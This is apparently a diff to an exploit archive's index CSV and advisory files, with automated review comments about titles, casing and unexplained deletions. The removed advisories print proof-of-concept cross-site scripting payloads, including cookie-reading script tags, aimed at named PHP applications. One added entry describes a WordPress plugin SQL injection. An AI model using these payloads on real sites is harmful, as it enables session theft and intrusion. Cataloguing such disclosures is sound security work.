6270,platforms/php/webapps/6270.txt,"SFS Affiliate Directory - 'id' SQL Injection",2008-08-19,"Hussin X",php,webapps,0
6270,platforms/php/webapps/6270.txt,"Affiliate Directory - 'id' Parameter SQL Injection",2008-08-19,"Hussin X",php,webapps,0
6271,platforms/php/webapps/6271.txt,"Ad Board - 'id' SQL Injection",2008-08-19,"Hussin X",php,webapps,0
6273,platforms/php/webapps/6273.txt,"SunShop 4.1.4 - 'id' SQL Injection",2008-08-19,"GulfTech Security",php,webapps,0
6276,platforms/php/webapps/6276.txt,"Banner Management Script - 'tr.php id' SQL Injection",2008-08-19,S.W.A.T.,php,webapps,0
@ -19648,7 +19648,7 @@ id,file,description,date,author,platform,type,port
6891,platforms/php/webapps/6891.txt,"Absolute Form Processor 4.0 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0
6892,platforms/php/webapps/6892.txt,"Absolute Live Support 5.1 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0
6893,platforms/php/webapps/6893.txt,"Absolute Control Panel XE 1.5 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0
6894,platforms/php/webapps/6894.txt,"SFS EZ Gaming Directory - 'Directory.php id' SQL Injection",2008-10-31,Hurley,php,webapps,0
6894,platforms/php/webapps/6894.txt,"SFS EZ Gaming Directory - 'directory.php' SQL Injection",2008-10-31,Hurley,php,webapps,0
6895,platforms/php/webapps/6895.txt,"SFS EZ Adult Directory - 'Directory.php id' SQL Injection",2008-10-31,Hurley,php,webapps,0
6896,platforms/php/webapps/6896.txt,"Logz podcast CMS 1.3.1 - (add_url.php art) SQL Injection",2008-10-31,ZoRLu,php,webapps,0
6897,platforms/php/webapps/6897.txt,"cpanel 11.x - Cross-Site Scripting / Local File Inclusion",2008-10-31,"Khashayar Fereidani",php,webapps,0
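Review bot: The new title for 6894 drops the 'id' parameter and lowercases the file name ('Directory.php id' becomes 'directory.php'), while the sibling row 6895 directly below keeps 'Directory.php id' unchanged. If the lowercase spelling is the correct file name it should be applied to 6895 as well, and the parameter name should be kept in both, for example "'directory.php' 'id' Parameter SQL Injection" or whichever form the project settles on.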
@ -19659,7 +19659,7 @@ id,file,description,date,author,platform,type,port
6903,platforms/php/webapps/6903.txt,"SFS EZ HotScripts-like Site - 'cid' SQL Injection",2008-10-31,TR-ShaRk,php,webapps,0
6904,platforms/php/webapps/6904.txt,"Absolute NewsLetter 6.1 - Insecure Cookie Handling",2008-10-31,x0r,php,webapps,0
6905,platforms/php/webapps/6905.txt,"SFS EZ Hosting Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,php,webapps,0
6906,platforms/php/webapps/6906.txt,"SFS EZ Gaming Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,php,webapps,0
6906,platforms/php/webapps/6906.txt,"SFS EZ Gaming Directory - 'cat_id' Parameter SQL Injection",2008-10-31,BeyazKurt,php,webapps,0
6907,platforms/php/webapps/6907.txt,"SFS EZ Home Business Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,php,webapps,0
6908,platforms/php/webapps/6908.txt,"SFS EZ Link Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,php,webapps,0
6909,platforms/php/webapps/6909.txt,"Adult Banner Exchange Website - (targetid) SQL Injection",2008-10-31,"Hussin X",php,webapps,0
@ -23038,7 +23038,7 @@ id,file,description,date,author,platform,type,port
12619,platforms/php/webapps/12619.txt,"Cybertek CMS - Local File Inclusion",2010-05-16,XroGuE,php,webapps,0
12620,platforms/php/webapps/12620.txt,"The iceberg - 'Content Management System' SQL Injection",2010-05-16,cyberlog,php,webapps,0
12623,platforms/php/webapps/12623.txt,"Joomla! Component 'com_simpledownload' 0.9.5 - Local File Disclosure",2010-05-16,ALTBTA,php,webapps,0
12624,platforms/php/webapps/12624.txt,"LinPHA 1.3.2 - (rotate.php) Remote Command Execution",2010-05-16,"Sn!pEr.S!Te Hacker",php,webapps,0
12624,platforms/php/webapps/12624.txt,"LinPHA 1.3.2 - 'rotate.php' Remote Command Execution",2010-05-16,"Sn!pEr.S!Te Hacker",php,webapps,0
12628,platforms/php/webapps/12628.txt,"EgO 0.7b - 'FCKeditor' Arbitrary File Upload",2010-05-16,ITSecTeam,php,webapps,0
12629,platforms/php/webapps/12629.txt,"Tainos - Multiple Vulnerabilities",2010-05-16,XroGuE,php,webapps,0
12630,platforms/php/webapps/12630.txt,"I-Vision CMS - Cross-Site Scripting / SQL Injection",2010-05-16,Ariko-Security,php,webapps,0
@ -25553,7 +25553,7 @@ id,file,description,date,author,platform,type,port
20981,platforms/php/webapps/20981.txt,"SugarCRM Community Edition 6.5.2 (Build 8410) - Multiple Vulnerabilities",2012-09-01,"Brendan Coles",php,webapps,0
20983,platforms/php/webapps/20983.pl,"Joomla! Component 'com_spidercalendar' - SQL Injection",2012-09-01,D4NB4R,php,webapps,0
20987,platforms/asp/webapps/20987.txt,"Citrix Nfuse 1.51 - Webroot Disclosure",2001-07-02,sween,asp,webapps,0
20995,platforms/php/webapps/20995.txt,"cobalt qube webmail 1.0 - Directory Traversal",2001-07-05,kf,php,webapps,0
20995,platforms/php/webapps/20995.txt,"Cobalt Qube Webmail 1.0 - Directory Traversal",2001-07-05,kf,php,webapps,0
20996,platforms/php/webapps/20996.txt,"Basilix Webmail 1.0 - File Disclosure",2001-07-06,"karol _",php,webapps,0
21005,platforms/php/webapps/21005.txt,"admidio 2.3.5 - Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",php,webapps,0
21007,platforms/php/webapps/21007.txt,"AV Arcade Free Edition - 'add_rating.php id Parameter' Blind SQL Injection",2012-09-02,DaOne,php,webapps,0
@ -28728,10 +28728,10 @@ id,file,description,date,author,platform,type,port
27188,platforms/ios/webapps/27188.txt,"Private Photos 1.0 iOS - Persistent Cross-Site Scripting",2013-07-29,Vulnerability-Lab,ios,webapps,0
27189,platforms/ios/webapps/27189.txt,"WebDisk 3.0.2 PhotoViewer iOS - Command Execution",2013-07-29,Vulnerability-Lab,ios,webapps,0
27190,platforms/php/webapps/27190.txt,"FluxBB 1.5.3 - Multiple Vulnerabilities",2013-07-29,LiquidWorm,php,webapps,0
27192,platforms/php/webapps/27192.txt,"LinPHA 0.9.x/1.0 - 'index.php' lang Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0
27193,platforms/php/webapps/27193.txt,"LinPHA 0.9.x/1.0 - install.php language Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0
27194,platforms/php/webapps/27194.txt,"LinPHA 0.9.x/1.0 - sec_stage_install.php language Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0
27195,platforms/php/webapps/27195.txt,"LinPHA 0.9.x/1.0 - forth_stage_install.php language Variable POST Method Local File Inclusion",2006-02-11,rgod,php,webapps,0
27192,platforms/php/webapps/27192.txt,"LinPHA 0.9.x/1.0 - 'lang' Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0
27193,platforms/php/webapps/27193.txt,"LinPHA 0.9.x/1.0 - 'install.php' Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0
27194,platforms/php/webapps/27194.txt,"LinPHA 0.9.x/1.0 - 'sec_stage_install.php' Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0
27195,platforms/php/webapps/27195.txt,"LinPHA 0.9.x/1.0 - 'forth_stage_install.php' Local File Inclusion",2006-02-11,rgod,php,webapps,0
27197,platforms/php/webapps/27197.txt,"ImageVue 0.16.1 - dir.php Folder Permission Disclosure",2006-02-11,zjieb,php,webapps,0
27198,platforms/php/webapps/27198.txt,"ImageVue 0.16.1 - readfolder.php path Variable Arbitrary Directory Listing",2006-02-11,zjieb,php,webapps,0
27199,platforms/php/webapps/27199.txt,"ImageVue 0.16.1 - 'index.php' bgcol Parameter Cross-Site Scripting",2006-02-11,zjieb,php,webapps,0
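Review bot: In the new titles for 27193 and 27194 the word "Parameter" now follows a file name ("'install.php' Parameter Local File Inclusion", "'sec_stage_install.php' Parameter Local File Inclusion"), because the actual parameter name "language" from the old titles was removed. As written it reads as if install.php were the parameter. Either restore the name ('language' Parameter) or drop the word "Parameter", as was done for 27195. The four rows also end up in three different shapes (27192 keeps only the parameter, 27193/27194 keep only the file plus a dangling "Parameter", 27195 keeps only the file), and the ImageVue context rows below still use the unquoted old style.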
@ -29078,7 +29078,6 @@ id,file,description,date,author,platform,type,port
27666,platforms/php/webapps/27666.txt,"Manila 9.0.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-17,"Aaron Kaplan",php,webapps,0
27667,platforms/php/webapps/27667.txt,"MyBB 1.1 - Global Variable Overwrite",2006-04-17,imei,php,webapps,0
27669,platforms/php/webapps/27669.txt,"Coppermine 1.4.4 - 'index.php' Local File Inclusion",2006-04-17,imei,php,webapps,0
27671,platforms/php/webapps/27671.txt,"LinPHA 1.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-18,d4igoro,php,webapps,0
27672,platforms/cgi/webapps/27672.txt,"axoverzicht.CGI - Cross-Site Scripting",2006-04-18,Qex,cgi,webapps,0
27673,platforms/php/webapps/27673.txt,"PHPLinks 2.1.2/2.1.3 - 'index.php' Cross-Site Scripting",2006-04-18,r0t,php,webapps,0
27674,platforms/php/webapps/27674.txt,"RechnungsZentrale 2 1.1.3 - Authent.php4 SQL Injection",2006-04-18,"GroundZero Security",php,webapps,0
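Review bot: Row 27671 ("LinPHA 1.1 - Multiple Cross-Site Scripting Vulnerabilities") is deleted here (the hunk goes from 7 lines to 6) with nothing in the hunk indicating whether it was a duplicate, was merged into another id, or was withdrawn. Anything that references the id or platforms/php/webapps/27671.txt will silently stop resolving, so suggest stating the reason and the surviving id, if any, in the commit message. The same applies to the other single-row removals later in this patch (28966, 29495, 31060, 31657).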
@ -30006,7 +30005,6 @@ id,file,description,date,author,platform,type,port
28963,platforms/php/webapps/28963.txt,"Bitweaver 1.x - fisheye/index.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0
28964,platforms/php/webapps/28964.txt,"Bitweaver 1.x - wiki/orphan_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0
28965,platforms/php/webapps/28965.txt,"Bitweaver 1.x - wiki/list_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0
28966,platforms/php/webapps/28966.txt,"Drake CMS 0.2 - 'index.php' Cross-Site Scripting",2006-11-10,CorryL,php,webapps,0
28967,platforms/php/webapps/28967.txt,"ExoPHPDesk 1.2 - Pipe.php Remote File Inclusion",2006-11-11,Firewall1954,php,webapps,0
28970,platforms/php/webapps/28970.txt,"WordPress Plugin Dexs PM System - Authenticated Persistent Cross-Site Scripting",2013-10-15,TheXero,php,webapps,80
28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 - (exportcsv.php sondage Parameter) SQL Injection",2013-10-15,drone,php,webapps,80
@ -30391,7 +30389,6 @@ id,file,description,date,author,platform,type,port
29491,platforms/php/webapps/29491.txt,"MyBloggie 2.1.5 - 'index.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
40368,platforms/cgi/webapps/40368.sh,"Inteno EG101R1 VoIP Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
29492,platforms/php/webapps/29492.txt,"MyBloggie 2.1.5 - 'login.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
29495,platforms/php/webapps/29495.txt,"Sabros.US 1.7 - 'index.php' Cross-Site Scripting",2007-01-18,CorryL,php,webapps,0
29497,platforms/php/webapps/29497.txt,"Easebay Resources Paypal Subscription - Manager Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0
29498,platforms/php/webapps/29498.txt,"Easebay Resources Login Manager - Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0
29499,platforms/php/webapps/29499.txt,"SMF 1.1 - 'index.php' HTML Injection",2007-01-20,"Aria-Security Team",php,webapps,0
@ -30664,7 +30661,7 @@ id,file,description,date,author,platform,type,port
29796,platforms/hardware/webapps/29796.pl,"Pirelli Discus DRG A125g - Remote Change WiFi Password",2013-11-24,"Sebastián Magof",hardware,webapps,0
29797,platforms/php/webapps/29797.txt,"MyBB Ajaxfs 2 Plugin - SQL Injection",2013-11-24,"IeDb ir",php,webapps,0
29802,platforms/hardware/webapps/29802.txt,"TP-Link WR740N/WR740ND - Multiple Cross-Site Request Forgery Vulnerabilities",2013-11-25,"Samandeep Singh",hardware,webapps,0
29805,platforms/php/webapps/29805.txt,"Drake CMS 0.3.7 - 404.php Local File Inclusion",2007-03-30,"HACKERS PAL",php,webapps,0
29805,platforms/php/webapps/29805.txt,"Drake CMS 0.3.7 - '404.php' Local File Inclusion",2007-03-30,"HACKERS PAL",php,webapps,0
29806,platforms/php/webapps/29806.pl,"PHP-Fusion 6.1.5 - Calendar_Panel Module Show_Event.php SQL Injection",2007-03-31,UNIQUE-KEY,php,webapps,0
29817,platforms/asp/webapps/29817.txt,"Gazi Okul Sitesi 2007 - Fotokategori.asp SQL Injection",2007-04-04,CoNqUeRoR,asp,webapps,0
29821,platforms/php/webapps/29821.txt,"Livor 2.5 - 'index.php' Cross-Site Scripting",2007-04-06,"Arham Muhammad",php,webapps,0
@ -31347,7 +31344,6 @@ id,file,description,date,author,platform,type,port
31055,platforms/asp/webapps/31055.txt,"Multiple Web Wiz Products - Remote Information Disclosure",2008-01-23,AmnPardaz,asp,webapps,0
31058,platforms/asp/webapps/31058.txt,"Pre Hotel and Resorts - 'user_login.asp' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0
31059,platforms/asp/webapps/31059.txt,"E-Smart Cart - 'Members Login' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0
31060,platforms/php/webapps/31060.txt,"Drake CMS 0.4.9 - 'index.php' Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
31061,platforms/php/webapps/31061.txt,"Trixbox 2.4.2 - user/index.php Query String Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
31062,platforms/php/webapps/31062.txt,"Trixbox 2.4.2 - maint/index.php Query String Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
31063,platforms/php/webapps/31063.txt,"WebCalendar 1.1.6 - pref.php Query String Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
@ -31756,7 +31752,6 @@ id,file,description,date,author,platform,type,port
31653,platforms/php/webapps/31653.txt,"amfPHP 1.2 - browser/details class Parameter Cross-Site Scripting",2008-04-15,"Alberto Cuesta Partida",php,webapps,0
31654,platforms/php/webapps/31654.txt,"W2B Online Banking - 'ilang' Parameter Remote File Inclusion",2008-04-15,THuM4N,php,webapps,0
31655,platforms/php/webapps/31655.txt,"Istant-Replay - 'read.php' Remote File Inclusion",2008-04-15,THuGM4N,php,webapps,0
31657,platforms/php/webapps/31657.txt,"Blogator-script 0.95 - 'bs_auth.php' Cross-Site Scripting",2008-04-16,ZoRLu,php,webapps,0
31658,platforms/php/webapps/31658.txt,"MyBoard 1.0.12 - 'rep.php' Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0
31659,platforms/php/webapps/31659.txt,"PHP-Stats 0.1.9.1 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2008-04-17,ZoRLu,php,webapps,0
31660,platforms/php/webapps/31660.txt,"EsContacts 1.0 - add_groupe.php msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0
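
Review bot: rows 31654 and 31655 in this hunk's context credit the same-day submissions to "THuM4N" and "THuGM4N" respectively, which looks like one author spelled two ways. Since this commit is already cleaning up metadata, pick the correct handle and use it on both rows, otherwise per-author lookups will split the entries.
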
@ -31765,7 +31760,7 @@ id,file,description,date,author,platform,type,port
31663,platforms/php/webapps/31663.txt,"EsContacts 1.0 - importer.php msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0
31664,platforms/php/webapps/31664.txt,"EsContacts 1.0 - 'login.php' msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0
31665,platforms/php/webapps/31665.txt,"EsContacts 1.0 - search.php msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0
31666,platforms/asp/webapps/31666.txt,"CoBaLT 2.0 - 'adminler.asp' SQL Injection",2008-04-17,U238,asp,webapps,0
31666,platforms/asp/webapps/31666.txt,"Cobalt 2.0 - 'adminler.asp' SQL Injection",2008-04-17,U238,asp,webapps,0
31668,platforms/php/webapps/31668.txt,"TLM CMS 3.1 - Multiple SQL Injections",2008-04-18,ZoRLu,php,webapps,0
31669,platforms/php/webapps/31669.txt,"Wikepage Opus 13 2007.2 - 'wiki' Parameter Cross-Site Scripting",2008-04-18,"Gerendi Sandor Attila",php,webapps,0
31670,platforms/php/webapps/31670.txt,"WordPress 2.3.3 - 'cat' Parameter Directory Traversal",2008-04-18,"Gerendi Sandor Attila",php,webapps,0
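
Review bot: the rename of row 31666 from "CoBaLT 2.0" to "Cobalt 2.0" changes the product's casing with no reference for the vendor's own spelling; please confirm it against the advisory before normalizing. If this is a style pass, the EsContacts rows above are also inconsistent: 31664 quotes 'login.php' while 31663 and 31665 leave importer.php and search.php bare.
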
@ -32060,7 +32055,6 @@ id,file,description,date,author,platform,type,port
32100,platforms/php/webapps/32100.txt,"RunCMS 1.6.1 - config.php bbPath[root_theme] Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0
32101,platforms/php/webapps/32101.txt,"eSyndiCat 1.6 - 'admin_lng' Cookie Parameter Authentication Bypass",2008-07-21,Ciph3r,php,webapps,0
32102,platforms/php/webapps/32102.txt,"AlphAdmin CMS 1.0.5_03 - 'aa_login' Cookie Parameter Authentication Bypass",2008-07-21,Ciph3r,php,webapps,0
32103,platforms/php/webapps/32103.txt,"VisualPic 0.3.1 - Cross-Site Scripting",2008-07-21,Ciph3r,php,webapps,0
32106,platforms/php/webapps/32106.txt,"Claroline 1.8 - learnPath/calendar/myagenda.php Query String Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0
32107,platforms/php/webapps/32107.txt,"Claroline 1.8 - user/user.php Query String Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0
32108,platforms/php/webapps/32108.txt,"Claroline 1.8 - tracking/courseLog.php view Parameter Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0
@ -32528,8 +32522,6 @@ id,file,description,date,author,platform,type,port
32897,platforms/java/webapps/32897.txt,"Cisco Subscriber Edge Services Manager - Cross-Site Scripting / HTML Injection",2009-04-09,"Usman Saeed",java,webapps,0
32898,platforms/asp/webapps/32898.txt,"XIGLA Absolute Form Processor XE 1.5 - 'login.asp' SQL Injection",2009-04-09,"ThE g0bL!N",asp,webapps,0
32903,platforms/asp/webapps/32903.txt,"People-Trak - Login SQL Injection",2009-04-13,Mormoroth.net,asp,webapps,0
32905,platforms/php/webapps/32905.txt,"LinPHA 1.3.2/1.3.3 - 'login.php' Cross-Site Scripting",2009-04-09,"Gerendi Sandor Attila",php,webapps,0
32906,platforms/php/webapps/32906.txt,"LinPHA 1.3.2/1.3.3 - new_images.php Cross-Site Scripting",2009-04-09,"Gerendi Sandor Attila",php,webapps,0
32907,platforms/cgi/webapps/32907.txt,"Banshee 1.4.2 DAAP Extension - 'apps/web/vs_diag.cgi' Cross-Site Scripting",2009-04-13,"Anthony de Almeida Lopes",cgi,webapps,0
32908,platforms/multiple/webapps/32908.txt,"IBM Tivoli Continuous Data Protection for Files 3.1.4.0 - Cross-Site Scripting",2009-04-14,"Abdul-Aziz Hariri",multiple,webapps,0
32909,platforms/java/webapps/32909.txt,"Novell Teaming 1.0 - User Enumeration Weakness / Multiple Cross-Site Scripting Vulnerabilities",2009-04-15,"Michael Kirchner",java,webapps,0
@ -33145,7 +33137,6 @@ id,file,description,date,author,platform,type,port
34095,platforms/php/webapps/34095.txt,"PonVFTP - 'login.php' SQL Injection",2010-01-15,S2K9,php,webapps,0
34096,platforms/php/webapps/34096.txt,"CuteSITE CMS 1.x - manage/add_user.php user_id Parameter SQL Injection",2010-06-06,"High-Tech Bridge SA",php,webapps,0
34097,platforms/php/webapps/34097.txt,"CuteSITE CMS 1.x - manage/main.php fld_path Parameter Cross-Site Scripting",2010-06-06,"High-Tech Bridge SA",php,webapps,0
34154,platforms/php/webapps/34154.txt,"Software Index - 'signinform.php' Cross-Site Scripting",2010-06-27,indoushka,php,webapps,0
34155,platforms/php/webapps/34155.txt,"Ceica-GW - 'login.php' Cross-Site Scripting",2010-06-27,indoushka,php,webapps,0
34157,platforms/php/webapps/34157.txt,"Firebook - Multiple Cross-Site Scripting / Directory Traversal Vulnerabilities",2010-06-17,MustLive,php,webapps,0
34116,platforms/php/webapps/34116.txt,"Bits Video Script 2.05 Gold Beta - showcasesearch.php rowptem[template] Parameter Remote File Inclusion",2010-01-18,indoushka,php,webapps,0
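
Review bot: row 34116 sits after 34157 in this hunk, so the rows around the removal are not in id order. If any consumer of the CSV assumes ascending ids, move 34116 up while the neighbouring lines are being touched, or note that the file is not sorted.
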
@ -36262,7 +36253,7 @@ id,file,description,date,author,platform,type,port
39269,platforms/php/webapps/39269.txt,"WordPress Plugin Lead Octopus Power - 'id' Parameter SQL Injection",2014-07-28,Amirh03in,php,webapps,0
39270,platforms/php/webapps/39270.txt,"WordPress Plugin WhyDoWork AdSense - options-general.php Cross-Site Request Forgery (Option Manipulation)",2014-07-28,"Dylan Irzi",php,webapps,0
39271,platforms/php/webapps/39271.txt,"CMSimple - Default Administrator Credentials",2014-07-28,"Govind Singh",php,webapps,0
39272,platforms/php/webapps/39272.txt,"CMSimple 4.4.4 - Remote file Inclusion",2014-07-28,"Govind Singh",php,webapps,0
39272,platforms/php/webapps/39272.txt,"CMSimple 4.4.4 - Remote File Inclusion",2014-07-28,"Govind Singh",php,webapps,0
39273,platforms/php/webapps/39273.txt,"CMSimple - /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0
39279,platforms/php/webapps/39279.txt,"WordPress Plugin wpSS - 'ss_handler.php' SQL Injection",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0
39280,platforms/php/webapps/39280.txt,"WordPress Plugin HDW Player - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0
@ -36784,3 +36775,5 @@ id,file,description,date,author,platform,type,port
40753,platforms/php/webapps/40753.php,"Schoolhos CMS 2.29 - Remote Code Execution / SQL Injection",2016-11-13,0x4148,php,webapps,0
40755,platforms/php/webapps/40755.html,"ATutor 2.2.2 - Cross-Site Request Forgery (Add New Course)",2016-11-13,"Saravana Kumar",php,webapps,0
40756,platforms/php/webapps/40756.py,"Boonex Dolphin 7.3.2 - Authentication Bypass / Remote Code Execution",2016-11-14,0x4148,php,webapps,0
40771,platforms/php/webapps/40771.txt,"Wordpress Plugin Answer My Question 1.3 - SQL Injection",2016-11-17,"Lenon Leite",php,webapps,0
40772,platforms/php/webapps/40772.txt,"Wordpress Plugin Sirv 1.3.1 - SQL Injection",2016-11-17,"Lenon Leite",php,webapps,0
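
Review bot: the two added rows (40771, 40772) spell the product "Wordpress Plugin", while the existing rows in this file use "WordPress Plugin" (39269, 39270, 39279, 39280). Use the established casing so a case-sensitive title search for WordPress plugins returns the new entries too.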

@ -1,4 +1,4 @@
source: http://www.securityfocus.com/bid/45211/discuss
source: http://www.securityfocus.com/bid/45211/info
Real Estate Single is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

@ -1,4 +1,4 @@
source: http://www.securityfocus.com/bid/45212/discuss
source: http://www.securityfocus.com/bid/45212/info
Multi Agent System is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

@ -1,4 +1,4 @@
source: http://www.securityfocus.com/bid/68
source: http://www.securityfocus.com/bid/68/info
http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port 663/info
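
Review bot: the new source line points at bid/68/info, but the unchanged example line below it still ends in a stray " 663/info", which reads as the tail of the original source URL after it was split in the middle of the BID number. Appending /info to the truncated "bid/68" therefore produces a link to a different BID and leaves the fragment attached to the proxy example. Rejoin the two pieces into a single source URL and strip the fragment from the example line; the hunk for the next file has the identical pattern.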

@ -1,4 +1,4 @@
source: http://www.securityfocus.com/bid/68
source: http://www.securityfocus.com/bid/68/info
http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port 663/info

@ -1,11 +0,0 @@
source: http://www.securityfocus.com/bid/17581/info
LinPHA is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
LinPHA 1.1.0 is reported vulnerable. Other versions may be affected as well.
http://www.example.com/plugins/stats/stats_view.php?date_from=[XSS]
http://www.example.com/plugins/stats/stats_view.php?date_to=[XSS]
http://www.example.com/plugins/stats/stats_view.php?date=[XSS]
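
Review bot: this whole-file deletion, and the run of deletions that follows it (BIDs 20998, 22115, 27459, 28810, 30334, 34500, 40914), has no stated reason; the commit summary only says "3 new exploits". Only the Drake CMS 0.2 file carries a visible justification, its NOTE that the BID was retired as not exploitable. Record in the commit message whether each removed file was a duplicate, and of which id, so that references to the old ids can be redirected.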

@ -1,11 +0,0 @@
source: http://www.securityfocus.com/bid/20998/info
Drake CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Version 0.2 is vulnerable; other versions may also be affected.
NOTE: This BID is being retired because reports indicate that this issue is not exploitable.
http://www.example.com//index.php?option=contact&Itemid=10&task=category&id=<ScRiPt%20%0a%0d>alert(764606807)%3B</ScRiPt>

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/22115/info
The 'sabros.us' application is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/index.php?tag=</title><script>alert(document.cookie)</script>

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/27459/info
Drake CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Drake CMS 0.4.9 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/index.php?option="'><IFRAME%20SRC="javascript:alert('XSS');"></IFRAME>&Itemid=12

@ -1,11 +0,0 @@
source: http://www.securityfocus.com/bid/28810/info
Blogator-script is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Blogator-script 0.95 is affected; other versions may also be vulnerable.
http://www.example.com/BS0.95/Blogator-script/bs_auth.php?msg=[XSS]

@ -1,11 +0,0 @@
source: http://www.securityfocus.com/bid/30334/info
VisualPic is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
VisualPic 0.3.1 is vulnerable; other versions may be affected as well.
http://www.example.com/visualpic/?login&pic=>"><script>alert("XSS")</script>
http://www.example.com/visualpic/?pic=%00'"><script>alert("XSS")</script>
http://www.example.com/visualpic/?login&pic=>"><script>alert("XSS")</script>

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/34500/info
LinPHA is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
Attackers can leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help attackers steal cookie-based authentication credentials and launch other attacks.
Versions prior to LinPHA 1.3.4 are vulnerable.
http://www.example.com/linpha-1.3.2/login.php?ref=&#039;><script>alert(1)</ScRiPt>

@ -1,10 +0,0 @@
source: http://www.securityfocus.com/bid/34500/info
LinPHA is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
Attackers can leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help attackers steal cookie-based authentication credentials and launch other attacks.
Versions prior to LinPHA 1.3.4 are vulnerable.
http://www.example.com/test/linpha-1.3.2/new_images.php?order=%22%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com/test/linpha-1.3.2/new_images.php?pn=%22%3Cscript%3Ealert(1)%3C/script%3E

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/40914/info
Software Index is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/signinform.php?msg=/"><marquee><font%20color=gren%20size=30>indoushka</font></marquee>

platforms/php/webapps/40771.txt Executable file

@ -0,0 +1,31 @@
# Exploit Title: Answer My Question 1.3 Plugin for WordPress Sql Injection
# Date: 10/11/2016
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/answer-my-question/
# Software Link: https://wordpress.org/plugins/answer-my-question/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 1.3
# Tested on: Windows 8.1
1 - Description
$_POST['id'] is not escaped. Url is accessible for any user.
